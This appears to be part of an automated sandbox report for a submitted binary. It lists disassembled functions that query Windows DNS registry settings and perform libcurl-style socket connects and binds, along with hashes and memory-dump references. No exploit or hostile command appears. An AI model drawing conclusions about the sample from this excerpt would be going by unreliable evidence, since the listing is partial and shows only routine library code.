                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E4AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E4AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00E4AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E4AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E4AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 00E4AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00E4AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00E4AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00E4AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 00E4AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 00E4ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 00E4AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00E4AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00E4AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00E4AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00E4AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00E4B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: fdd073c5fed68d255bb89fa006db6d3ef4803047d6f3acac5159646247fa4402
                                                              • Instruction ID: b246ed0a5bf134351e343f8ff59ddaf805c0ba99c3ae4cdbbdb81d422143216c
                                                              • Opcode Fuzzy Hash: fdd073c5fed68d255bb89fa006db6d3ef4803047d6f3acac5159646247fa4402
                                                              • Instruction Fuzzy Hash: 6E72B1B1644301AFE3209F24EC81B5BB7E8EF85714F185828F985EB291E775E944CB63
                                                              Function 00DCA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00DCA832
                                                              Strings
                                                              • Bind to local port %d failed, trying next, xrefs: 00DCAFE5
                                                              • cf-socket.c, xrefs: 00DCA5CD, 00DCA735
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00DCAD0A
                                                              • Could not set TCP_NODELAY: %s, xrefs: 00DCA871
                                                              • bind failed with errno %d: %s, xrefs: 00DCB080
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 00DCADAC
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 00DCA796
                                                              • Trying [%s]:%d..., xrefs: 00DCA689
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 00DCAE60
                                                              • Local port: %hu, xrefs: 00DCAF28
                                                              • Trying %s:%d..., xrefs: 00DCA7C2, 00DCA7DE
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00DCA6CE
                                                              • @, xrefs: 00DCA8F4
                                                              • @, xrefs: 00DCAC42
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 00DCAE1F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 1c324e15f74b4ba0114c59403f2c836f6cc1e8227284162d6831d223cff3dcce
                                                              • Instruction ID: c0f2762b20b49c2bd47ed1d5f6b61ad9c0ecfbf336f123ac605fb265a4e47c88
                                                              • Opcode Fuzzy Hash: 1c324e15f74b4ba0114c59403f2c836f6cc1e8227284162d6831d223cff3dcce
                                                              • Instruction Fuzzy Hash: 4B62F671504346ABE7258F28C845FABB7E5FF81318F08491DF98897291E771E845CBA3
                                                              Function 00E59740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 861 e59740-e5975b 862 e59780-e59782 861->862 863 e5975d-e59768 call e578a0 861->863 864 e59914-e5994e call 1118b70 RegOpenKeyExA 862->864 865 e59788-e597a0 call 1118e00 call e578a0 862->865 870 e5976e-e59770 863->870 871 e599bb-e599c0 863->871 878 e59950-e59955 864->878 879 e5995a-e59992 RegQueryValueExA RegCloseKey call 1118b98 864->879 865->871 874 e597a6-e597c5 865->874 870->874 875 e59772-e5977e 870->875 876 e59a0c-e59a15 871->876 885 e59827-e59833 874->885 886 e597c7-e597e0 874->886 875->865 878->876 887 e59997-e599b5 call e578a0 879->887 888 e59835-e5985c call e4e2b0 * 2 885->888 889 e5985f-e59872 call e55ca0 885->889 890 e597f6-e59809 886->890 891 e597e2-e597f3 call 1118b50 886->891 887->871 887->874 888->889 901 e599f0 889->901 902 e59878-e5987d call e577b0 889->902 890->885 900 e5980b-e59810 890->900 891->890 900->885 905 e59812-e59822 900->905 904 e599f5-e599fb call e55d00 901->904 909 e59882-e59889 902->909 915 e599fe-e59a09 904->915 905->876 909->904 914 e5988f-e5989b call e44fe0 909->914 914->901 920 e598a1-e598c3 call 1118b50 call e578a0 914->920 915->876 925 e599c2-e599ed call e4e2b0 * 2 920->925 926 e598c9-e598db call e4e2d0 920->926 925->901 926->925 930 e598e1-e598f0 call e4e2d0 926->930 930->925 936 e598f6-e59905 call e563f0 930->936 941 e59f66-e59f7f call e55d00 936->941 942 e5990b-e5990f 936->942 941->915 944 e59a3f-e59a5a call e56740 call e563f0 942->944 944->941 950 e59a60-e59a6e call e56d60 944->950 953 e59a70-e59a94 call e56200 call e567e0 call e56320 950->953 954 e59a1f-e59a39 call e56840 call e563f0 950->954 965 e59a16-e59a19 953->965 966 e59a96-e59ac6 call e4d120 953->966 954->941 954->944 965->954 967 e59fc1 965->967 971 e59ae1-e59af7 call e4d190 966->971 972 e59ac8-e59adb call e4d120 966->972 969 e59fc5-e59ffd call e55d00 call e4e2b0 * 2 967->969 969->915 971->954 979 e59afd-e59b09 call e44fe0 971->979 972->954 972->971 979->967 985 e59b0f-e59b29 call e4e730 979->985 991 e59f84-e59f88 985->991 992 e59b2f-e59b3a call e578a0 985->992 993 e59f95-e59f99 991->993 992->991 999 e59b40-e59b54 call e4e760 992->999 995 e59fa0-e59fb6 call e4ebf0 * 2 993->995 996 e59f9b-e59f9e 993->996 1008 e59fb7-e59fbe 995->1008 996->967 996->995 1004 e59f8a-e59f92 999->1004 1005 e59b5a-e59b6e call e4e730 999->1005 1004->993 1011 e59b70-e5a004 1005->1011 1012 e59b8c-e59b97 call e563f0 1005->1012 1008->967 1016 e5a015-e5a01d 1011->1016 1020 e59b9d-e59bbf call e56740 call e563f0 1012->1020 1021 e59c9a-e59cab call e4ea00 1012->1021 1018 e5a024-e5a045 call e4ebf0 * 2 1016->1018 1019 e5a01f-e5a022 1016->1019 1018->969 1019->969 1019->1018 1020->1021 1038 e59bc5-e59bda call e56d60 1020->1038 1028 e59f31-e59f35 1021->1028 1029 e59cb1-e59ccd call e4ea00 call e4e960 1021->1029 1034 e59f37-e59f3a 1028->1034 1035 e59f40-e59f61 call e4ebf0 * 2 1028->1035 1049 e59cfd-e59d0e call e4e960 1029->1049 1050 e59ccf 1029->1050 1034->954 1034->1035 1035->954 1038->1021 1048 e59be0-e59bf4 call e56200 call e567e0 1038->1048 1048->1021 1068 e59bfa-e59c0b call e56320 1048->1068 1058 e59d10 1049->1058 1059 e59d53-e59d55 1049->1059 1053 e59cd1-e59cec call e4e9f0 call e4e4a0 1050->1053 1070 e59d47-e59d51 1053->1070 1071 e59cee-e59cfb call e4e9d0 1053->1071 1063 e59d12-e59d2d call e4e9f0 call e4e4a0 1058->1063 1062 e59e69-e59e8e call e4ea40 call e4e440 1059->1062 1086 e59e94-e59eaa call e4e3c0 1062->1086 1087 e59e90-e59e92 1062->1087 1090 e59d2f-e59d3c call e4e9d0 1063->1090 1091 e59d5a-e59d6f call e4e960 1063->1091 1084 e59b75-e59b86 call e4ea00 1068->1084 1085 e59c11-e59c1c call e57b70 1068->1085 1075 e59dca-e59ddb call e4e960 1070->1075 1071->1049 1071->1053 1096 e59ddd-e59ddf 1075->1096 1097 e59e2e-e59e36 1075->1097 1084->1012 1106 e59f2d 1084->1106 1085->1012 1109 e59c22-e59c33 call e4e960 1085->1109 1116 e59eb0-e59eb1 1086->1116 1117 e5a04a-e5a04c 1086->1117 1094 e59eb3-e59ec4 call e4e9c0 1087->1094 1090->1063 1119 e59d3e-e59d42 1090->1119 1112 e59d71-e59d73 1091->1112 1113 e59dc2 1091->1113 1094->954 1126 e59eca-e59ed0 1094->1126 1105 e59e06-e59e21 call e4e9f0 call e4e4a0 1096->1105 1102 e59e3d-e59e5b call e4ebf0 * 2 1097->1102 1103 e59e38-e59e3b 1097->1103 1114 e59e5e-e59e67 1102->1114 1103->1102 1103->1114 1141 e59de1-e59dee call e4ec80 1105->1141 1142 e59e23-e59e2c call e4eac0 1105->1142 1106->1028 1128 e59c35 1109->1128 1129 e59c66-e59c75 call e578a0 1109->1129 1124 e59d9a-e59db5 call e4e9f0 call e4e4a0 1112->1124 1113->1075 1114->1062 1114->1094 1116->1094 1122 e5a057-e5a070 call e4ebf0 * 2 1117->1122 1123 e5a04e-e5a051 1117->1123 1119->1062 1122->1008 1123->967 1123->1122 1157 e59d75-e59d82 call e4ec80 1124->1157 1158 e59db7-e59dc0 call e4eac0 1124->1158 1133 e59ee5-e59ef2 call e4e9f0 1126->1133 1135 e59c37-e59c51 call e4e9f0 1128->1135 1154 e5a011 1129->1154 1155 e59c7b-e59c8f call e4e7c0 1129->1155 1133->954 1151 e59ef8-e59f0e call e4e440 1133->1151 1135->1012 1172 e59c57-e59c64 call e4e9d0 1135->1172 1166 e59df1-e59e04 call e4e960 1141->1166 1142->1166 1173 e59f10-e59f26 call e4e3c0 1151->1173 1174 e59ed2-e59edf call e4e9e0 1151->1174 1154->1016 1155->1012 1169 e59c95-e5a00e 1155->1169 1178 e59d85-e59d98 call e4e960 1157->1178 1158->1178 1166->1097 1166->1105 1169->1154 1172->1129 1172->1135 1173->1174 1188 e59f28 1173->1188 1174->954 1174->1133 1178->1113 1178->1124 1188->967
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E59946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00E59974
                                                              • RegCloseKey.KERNELBASE(?), ref: 00E5998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: 03a429fb3f4a918899c394f308df38ce7fdd45a5bb061ba8668a6b4a34fbc540
                                                              • Instruction ID: 6be3f39391a101bc910ab02838ca67644e08b113934121fc3b17f0115de55a6b
                                                              • Opcode Fuzzy Hash: 03a429fb3f4a918899c394f308df38ce7fdd45a5bb061ba8668a6b4a34fbc540
                                                              • Instruction Fuzzy Hash: 733294B5904201ABEB11AB24FC42A5B77E4AF94319F085C34FD49B7263F721E918D763
                                                              Function 00DC8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1272 dc8b50-dc8b69 1273 dc8b6b-dc8b74 1272->1273 1274 dc8be6 1272->1274 1276 dc8beb-dc8bf2 1273->1276 1277 dc8b76-dc8b8d 1273->1277 1275 dc8be9 1274->1275 1275->1276 1278 dc8b8f-dc8ba7 call da6e40 1277->1278 1279 dc8bf3-dc8bfe call dca550 1277->1279 1286 dc8bad-dc8baf 1278->1286 1287 dc8cd9-dc8d16 SleepEx getsockopt 1278->1287 1284 dc8de4-dc8def 1279->1284 1285 dc8c04-dc8c08 1279->1285 1290 dc8e8c-dc8e95 1284->1290 1291 dc8df5-dc8e19 call dca150 1284->1291 1292 dc8dbd-dc8dc3 1285->1292 1293 dc8c0e-dc8c1d 1285->1293 1294 dc8bb5-dc8bb9 1286->1294 1295 dc8ca6-dc8cb0 1286->1295 1288 dc8d18-dc8d20 1287->1288 1289 dc8d22 1287->1289 1296 dc8d26-dc8d39 1288->1296 1289->1296 1297 dc8e97-dc8e9c 1290->1297 1298 dc8f00-dc8f06 1290->1298 1327 dc8e88 1291->1327 1328 dc8e1b-dc8e26 1291->1328 1292->1275 1300 dc8c1f-dc8c30 connect 1293->1300 1301 dc8c35-dc8c48 call dca150 1293->1301 1294->1276 1303 dc8bbb-dc8bc2 1294->1303 1295->1287 1302 dc8cb2-dc8cb8 1295->1302 1306 dc8d3b-dc8d3d 1296->1306 1307 dc8d43-dc8d61 call dad8c0 call dca150 1296->1307 1308 dc8e9e-dc8eb6 call da2a00 1297->1308 1309 dc8edf-dc8eef call d978b0 1297->1309 1298->1276 1300->1301 1329 dc8c4d-dc8c4f 1301->1329 1311 dc8ddc-dc8dde 1302->1311 1312 dc8cbe-dc8cd4 call dcb180 1302->1312 1303->1276 1304 dc8bc4-dc8bcc 1303->1304 1313 dc8bce-dc8bd2 1304->1313 1314 dc8bd4-dc8bda 1304->1314 1306->1307 1306->1311 1339 dc8d66-dc8d74 1307->1339 1308->1309 1333 dc8eb8-dc8edd call da3410 * 2 1308->1333 1331 dc8ef2-dc8efc 1309->1331 1311->1275 1311->1284 1312->1284 1313->1276 1313->1314 1314->1276 1322 dc8bdc-dc8be1 1314->1322 1330 dc8dac-dc8db8 call dd50a0 1322->1330 1327->1290 1334 dc8e2e-dc8e85 call dad090 call dd4fd0 1328->1334 1335 dc8e28-dc8e2c 1328->1335 1336 dc8c8e-dc8c93 1329->1336 1337 dc8c51-dc8c58 1329->1337 1330->1276 1331->1298 1333->1331 1334->1327 1335->1327 1335->1334 1344 dc8dc8-dc8dd9 call dcb100 1336->1344 1345 dc8c99-dc8c9f 1336->1345 1337->1336 1342 dc8c5a-dc8c62 1337->1342 1339->1276 1346 dc8d7a-dc8d81 1339->1346 1349 dc8c6a-dc8c70 1342->1349 1350 dc8c64-dc8c68 1342->1350 1344->1311 1345->1295 1346->1276 1352 dc8d87-dc8d8f 1346->1352 1349->1336 1355 dc8c72-dc8c8b call dd50a0 1349->1355 1350->1336 1350->1349 1357 dc8d9b-dc8da1 1352->1357 1358 dc8d91-dc8d95 1352->1358 1355->1336 1357->1276 1359 dc8da7 1357->1359 1358->1276 1358->1357 1359->1330
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00DC8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00DC8CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00DC8D0E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: f111f5e77b476fdf6628b6d778f70d7f9df8ef1e1ad9d4e29791a78c741a2266
                                                              • Instruction ID: f5a9cdab628edf1ccaa89573a9938363f2c57c0861e2338099222c40f29a7fd4
                                                              • Opcode Fuzzy Hash: f111f5e77b476fdf6628b6d778f70d7f9df8ef1e1ad9d4e29791a78c741a2266
                                                              • Instruction Fuzzy Hash: F6B1AE70604706AFDB10CF24C985FA6BBA5AF45318F188A2DE85A4B2D2DB71EC44D772
                                                              Function 00D92F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1458 d92f17-d92f8c call 12198f0 call 1219ce0 1463 d931c9-d931cd 1458->1463 1464 d92f91-d92ff4 call d91619 RegOpenKeyExA 1463->1464 1465 d931d3-d931d6 1463->1465 1468 d92ffa-d9300b 1464->1468 1469 d931c5 1464->1469 1470 d9315c-d931ac RegEnumKeyExA 1468->1470 1469->1463 1471 d93010-d93083 call d91619 RegOpenKeyExA 1470->1471 1472 d931b2-d931c2 1470->1472 1476 d93089-d930d4 RegQueryValueExA 1471->1476 1477 d9314e-d93152 1471->1477 1472->1469 1478 d9313b-d9314b RegCloseKey 1476->1478 1479 d930d6-d93137 call 1219bc0 call 1219c50 call 1219ce0 call 1219af0 call 1219ce0 call 1218050 1476->1479 1477->1470 1478->1477 1479->1478
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                              • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: bced0c0d8990dbd255e9b4865eb638f30e8c305b47cce542355177dc6a27d545
                                                              • Instruction ID: d3ed4f8b5b4deec3d97a56c77d0a810244fbb171f3bb47078c42467137c8fe92
                                                              • Opcode Fuzzy Hash: bced0c0d8990dbd255e9b4865eb638f30e8c305b47cce542355177dc6a27d545
                                                              • Instruction Fuzzy Hash: 5471A3B490431A9FDB50DF69C58479EBBF0BF84308F10899DE898A7354D7749A88CF92
                                                              Function 00DC9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1492 dc9290-dc92ed call d976a0 1495 dc93c3-dc93ce 1492->1495 1496 dc92f3-dc92fb 1492->1496 1503 dc93e5-dc9427 call dad090 call dd4f40 1495->1503 1504 dc93d0-dc93e1 1495->1504 1497 dc93aa-dc93af 1496->1497 1498 dc9301-dc9333 call dad8c0 call dad9a0 1496->1498 1501 dc93b5-dc93bc 1497->1501 1502 dc9456-dc9470 1497->1502 1516 dc9335-dc9364 WSAIoctl 1498->1516 1517 dc93a7 1498->1517 1506 dc93be 1501->1506 1507 dc9429-dc9431 1501->1507 1503->1502 1503->1507 1504->1501 1508 dc93e3 1504->1508 1506->1502 1511 dc9439-dc943f 1507->1511 1512 dc9433-dc9437 1507->1512 1508->1502 1511->1502 1515 dc9441-dc9453 call dd50a0 1511->1515 1512->1502 1512->1511 1515->1502 1520 dc939b-dc93a4 1516->1520 1521 dc9366-dc936f 1516->1521 1517->1497 1520->1517 1521->1520 1524 dc9371-dc9390 setsockopt 1521->1524 1524->1520 1525 dc9392-dc9395 1524->1525 1525->1520
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00DC935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00DC9389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
